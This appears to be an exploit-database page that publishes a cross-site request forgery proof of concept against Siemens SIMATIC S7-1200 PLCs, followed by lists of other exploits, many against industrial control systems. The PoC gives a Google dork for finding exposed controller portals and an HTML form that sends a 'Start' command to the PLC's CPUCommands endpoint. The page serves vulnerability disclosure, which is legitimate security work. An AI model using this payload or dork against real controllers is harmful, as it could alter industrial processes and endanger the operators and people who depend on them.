Menu

Search for hundreds of thousands of exploits

"Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery"

Author

Exploit author

t4rkd3vilz

Platform

Exploit platform

linux

Release date

Exploit published date

2018-05-21

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015- 5698

# 1. Proof of Concept

<form method="POST" action="http://targetIp/CPUCommands">
    <input name="PriNav" value="Start">
    <input type="submit" value="Go!">
</form>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2018-07-13 "Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery" webapps hardware t4rkd3vilz
2018-07-09 "Tor Browser < 0.3.2.10 - Use After Free (PoC)" dos linux t4rkd3vilz
2018-07-02 "Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)" dos hardware t4rkd3vilz
2018-05-30 "Siemens SIMATIC S7-300 CPU - Remote Denial of Service" dos linux t4rkd3vilz
2018-05-24 "Honeywell XL Web Controller - Cross-Site Scripting" webapps linux t4rkd3vilz
2018-05-23 "Siemens SCALANCE S613 - Remote Denial of Service" dos linux t4rkd3vilz
2018-05-23 "Honeywell Scada System - Information Disclosure" webapps linux t4rkd3vilz
2018-05-22 "Nordex N149/4.0-4.5 - SQL Injection" webapps hardware t4rkd3vilz
2018-05-22 "Siemens SIMATIC S7-1500 CPU - Remote Denial of Service" dos linux t4rkd3vilz
2018-05-22 "Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting" webapps linux t4rkd3vilz
2018-05-21 "Schneider Electric PLCs - Cross-Site Request Forgery" webapps windows t4rkd3vilz
2018-05-21 "Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery" webapps linux t4rkd3vilz
2018-05-17 "Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery" webapps linux t4rkd3vilz
2018-05-16 "Rockwell Scada System 27.011 - Cross-Site Scripting" webapps windows t4rkd3vilz
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.